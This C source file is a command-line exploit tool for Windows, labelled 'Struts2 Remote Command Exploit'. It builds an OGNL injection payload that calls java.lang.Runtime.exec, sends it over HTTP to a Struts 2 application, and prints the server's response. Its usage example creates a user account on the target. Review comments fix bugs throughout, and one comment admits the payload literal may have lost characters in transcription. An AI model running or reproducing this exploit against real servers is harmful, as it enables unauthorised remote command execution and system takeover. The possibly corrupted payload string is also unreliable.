#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/* winsock2.h must come before windows.h, otherwise windows.h pulls in the
 * old winsock.h and the two headers conflict. */
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
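/* Connection state shared by InitSocket(), ConnectServer() and HttpGet().
 * File-local on purpose: nothing outside this translation unit uses it, and
 * the functions are not reentrant (one connection at a time). */
static SOCKET sock = INVALID_SOCKET;   /* INVALID_SOCKET until socket() succeeds */
static struct sockaddr_in client;      /* resolved target address, filled by InitSocket() */
static WSADATA wsa;                    /* Winsock startup data */
static struct hostent *host;           /* result of gethostbyname() for the target */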
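/*
 * InitSocket - start Winsock, resolve `Host` and prepare the globals
 * `client` (target address) and `sock` (an unconnected TCP socket).
 *
 * Host: hostname or dotted IPv4 address, resolved with gethostbyname().
 * Port: TCP port in host byte order.
 * Returns 1 on success, 0 on failure. On failure a message is printed and
 * Winsock is shut down again, so the caller has nothing to clean up.
 */
int InitSocket(char *Host, unsigned int Port)
{
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0) {
        printf("[-] WSAStartup Error!\n");
        return 0;
    }

    /* gethostbyname() signals failure by returning NULL. C has no exceptions,
     * so the try/catch that used to wrap this could never catch anything and
     * a bad host name was dereferenced as a NULL pointer. */
    host = gethostbyname(Host);
    if (host == NULL || host->h_addrtype != AF_INET || host->h_addr_list[0] == NULL) {
        printf("[-] socket_inaddr init error!\n");
        WSACleanup();
        return 0;
    }

    memset(&client, 0, sizeof(client));
    client.sin_family = AF_INET;
    client.sin_port = htons((unsigned short)Port);
    /* Copy exactly one IPv4 address. The old code copied
     * sizeof(host->h_addr_list[0]) bytes, i.e. the size of a pointer (8 on
     * 64-bit builds), which overran the 4-byte sin_addr field. */
    memcpy(&client.sin_addr, host->h_addr_list[0], sizeof(client.sin_addr));

    sock = socket(AF_INET, SOCK_STREAM, 0);
    /* socket() returns INVALID_SOCKET on failure. The old test
     * `if (sock = SOCKET_ERROR)` both used the wrong constant and assigned
     * instead of comparing, so a failed socket() was never detected. */
    if (sock == INVALID_SOCKET) {
        printf("[-] socket create error!\n");
        WSACleanup();
        return 0;
    }

    printf("[+] Socket Init success!\n");
    return 1;
}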
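/*
 * ConnectServer - resolve Host:Port via InitSocket() and connect the global
 * `sock` to it.
 *
 * Returns 1 when the TCP connection is established, 0 otherwise. On failure
 * the socket and Winsock are released, so the caller has nothing to clean up.
 */
int ConnectServer(char *Host, unsigned int Port)
{
    printf("Init socket ...\n");
    if (!InitSocket(Host, Port)) {
        return 0;   /* InitSocket() already printed and cleaned up */
    }

    printf("Connect the Server ...\n");
    /* `==`, not `=`: the original assigned SOCKET_ERROR to the return value
     * and so treated every connect() as failed. */
    if (connect(sock, (struct sockaddr *)&client, sizeof(client)) == SOCKET_ERROR) {
        printf("[-] Connect Error!\n");
        closesocket(sock);
        sock = INVALID_SOCKET;
        WSACleanup();
        return 0;
    }

    printf("[+] Connect successfull!\n");
    return 1;
}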
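/*
 * HttpGet - connect to Host:Port, send one HTTP/1.1 GET for "/<Req>" and
 * collect the raw response.
 *
 * Req: path plus query string, inserted into the request line verbatim. The
 *      caller must already have URL-encoded it (see handlecmd()).
 * Returns a pointer to a static, NUL-terminated buffer holding the response
 * (at most sizeof(recvbuf)-1 bytes; longer responses are truncated), or NULL
 * if the request did not fit, the connection failed, the send failed or no
 * data came back. The buffer is overwritten by the next call, so this
 * function is not reentrant. The previous version returned the address of a
 * local array, which is dangling as soon as the function returns.
 */
char *HttpGet(char *Host, unsigned int Port, char *Req)
{
    /* HTTP requires CRLF after every line and an empty line after the
     * headers; the old template had neither, so the request was one long
     * line a server cannot parse. "Connection: close" is the RFC token
     * ("Closed" is not) and makes the server close the connection, which is
     * what ends the receive loop below. Accept-Encoding is left out because
     * the response is printed and returned as text, not decompressed. */
    static const char http_header[] =
        "GET /%s HTTP/1.1\r\n"
        "Host: %s\r\n"
        "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
        "Accept-Language: zh-cn,zh;q=0.5\r\n"
        "Accept-Charset: GB2312,UTF-8;q=0.7,*;q=0.7\r\n"
        "Connection: close\r\n"
        "\r\n";
    static char recvbuf[20480];   /* static: handed to the caller after return */
    char req_buf[4096];
    size_t total = 0;
    int n;

    /* Host and Req come from the command line: format with a bound and
     * refuse anything that would have overflowed the old sprintf(). */
    n = snprintf(req_buf, sizeof(req_buf), http_header, Req, Host);
    if (n < 0 || (size_t)n >= sizeof(req_buf)) {
        printf("[-] request too long (%d bytes, limit %u)!\n", n, (unsigned)(sizeof(req_buf) - 1));
        return NULL;
    }

    if (!ConnectServer(Host, Port)) {
        return NULL;   /* ConnectServer() already printed and cleaned up */
    }

    printf("Send payload: %s\n", req_buf);
    n = send(sock, req_buf, n, 0);
    if (n == SOCKET_ERROR) {
        printf("[-] send error!\n");
        closesocket(sock);
        sock = INVALID_SOCKET;
        WSACleanup();
        return NULL;
    }
    printf("[+] send payload %d bytes!\n", n);

    /* One recv() may deliver only part of the response; keep reading until
     * the peer closes (Connection: close), an error occurs or the buffer is
     * full. One byte is reserved for the terminator. */
    while (total < sizeof(recvbuf) - 1) {
        n = recv(sock, recvbuf + total, (int)(sizeof(recvbuf) - 1 - total), 0);
        if (n <= 0) {
            break;   /* 0: peer closed; SOCKET_ERROR: failure */
        }
        total += (size_t)n;
    }
    /* recv() does not NUL-terminate; without this "%s" below read past the
     * received bytes (and uninitialised stack on an empty response). */
    recvbuf[total] = '\0';

    closesocket(sock);
    sock = INVALID_SOCKET;
    WSACleanup();

    if (total == 0) {
        printf("[-] no response received!\n");
        return NULL;
    }
    printf("[+] Response: %s\n", recvbuf);
    return recvbuf;
}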
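/*
 * usage - print the command-line synopsis and exit with a failure status.
 * Written to stderr so it does not mix with the response output on stdout.
 * Never returns. exit(-1) was replaced by EXIT_FAILURE: -1 is not a
 * portable exit status.
 */
void usage(void)
{
    fprintf(stderr, "Struts2 Remote Command Exploit\n");
    fprintf(stderr, "concat: ylbhz@hotmail.com\n");
    fprintf(stderr, "Usage: struts2exp <target> <port> <reqfile> <cmd>\n");
    /* The embedded quotes around the command were unescaped in the original
     * literal, which ended the string early. */
    fprintf(stderr, "Example: struts2exp localhost 8080 struts2Test/index.action \"net user ylbhz 123/add\"\n");
    exit(EXIT_FAILURE);
}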
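/*
 * handlecmd - make a shell command safe to embed in the query string of the
 * request. Spaces become '+', which the servlet container decodes back to
 * spaces (the original behaviour). In addition the characters that would
 * end or corrupt the parameter the command is embedded in ('&', '#', '%',
 * '+', '=') are percent-encoded; the old code passed them through unchanged
 * and produced a request that was split at the first '&' or '='.
 *
 * cmd: NUL-terminated command of any length.
 * Returns a newly malloc()ed, NUL-terminated string that the caller must
 * free(), or NULL if the allocation fails. The previous version wrote into a
 * fixed 256-byte allocation with no length check, a heap overflow for any
 * longer command.
 */
char *handlecmd(char *cmd)
{
    static const char hex[] = "0123456789ABCDEF";
    size_t len = strlen(cmd);
    size_t out = 0;
    char *ret;

    /* Worst case every byte expands to "%XX", plus the terminator. */
    if (len > (SIZE_MAX - 1) / 3) {
        return NULL;
    }
    ret = malloc(len * 3 + 1);
    if (ret == NULL) {
        return NULL;
    }

    for (size_t in = 0; in < len; in++) {
        unsigned char c = (unsigned char)cmd[in];
        if (c == ' ') {
            ret[out++] = '+';
        } else if (c == '&' || c == '#' || c == '%' || c == '+' || c == '=') {
            ret[out++] = '%';
            ret[out++] = hex[c >> 4];
            ret[out++] = hex[c & 0x0F];
        } else {
            ret[out++] = (char)c;
        }
    }
    ret[out] = '\0';
    return ret;
}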
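/*
 * Entry point: struts2exp <target> <port> <reqfile> <cmd>
 *   target  - host name or IPv4 address of the Struts 2 application
 *   port    - TCP port, 1..65535
 *   reqfile - action path relative to "/", e.g. struts2Test/index.action
 *   cmd     - command to run on the target; encoded by handlecmd() before it
 *             is placed in the query string
 * Returns 0 when a response was received, 1 otherwise (usage errors exit via
 * usage()). `void main` was changed to `int main` as the standard requires.
 */
int main(int argc, char *argv[])
{
    if (argc != 5) {
        usage();
    }

    /* strtoul() reports malformed input; atoi() silently returned 0 for
     * garbage and wrapped on overflow. The old check also accepted ports
     * above 65535, which htons() would have truncated. */
    char *end = NULL;
    errno = 0;
    unsigned long port = strtoul(argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE || port == 0 || port > 65535) {
        usage();
    }

    char *Target = argv[1];
    char *ReqFile = argv[3];
    char *cmd = argv[4];

    /* OGNL injection payload: a printf format taking (ReqFile, encoded cmd).
     * NOTE(review): the literal is reproduced as transcribed in the source
     * this was taken from, with only the transcription's inserted whitespace
     * removed. That transcription also appears to have dropped characters
     * (the quoting around the OGNL expressions, the class name case in
     * "java.lang.boolean"), so it must be checked against the original
     * exploit source before use. Backslashes are doubled so the bytes sent
     * are the ones shown here, and the embedded double quotes are escaped
     * (unescaped, they ended the string literal early). */
    static const char payload[] =
        "%s?(\\U0023_memberAccess[\\allowStaticMethodAccess\\])(meh)=true&(aaa)"
        "(\\u0023context[\\xwork.methodAccessor.denyMethodExecution\\]\\u003d\\u0023foo)"
        "(\\u0023foo\\u003dnew+java.lang.boolean(\"false\")&(asdf)"
        "(\\u0023rt.exec(\"%s\")(\\u0023rt\\u003d@java.lang.Runtime@getRuntime()=1";

    char *encoded = handlecmd(cmd);
    if (encoded == NULL) {
        printf("[-] out of memory!\n");
        return 1;
    }

    /* Bounded formatting: ReqFile and the command are attacker-chosen
     * command-line input; the old sprintf() into sendbuf had no limit. */
    char sendbuf[2048];
    int n = snprintf(sendbuf, sizeof(sendbuf), payload, ReqFile, encoded);
    free(encoded);   /* the original leaked this allocation */
    if (n < 0 || (size_t)n >= sizeof(sendbuf)) {
        printf("[-] request too long (%d bytes, limit %u)!\n", n, (unsigned)(sizeof(sendbuf) - 1));
        return 1;
    }

    return HttpGet(Target, (unsigned int)port, sendbuf) != NULL ? 0 : 1;
}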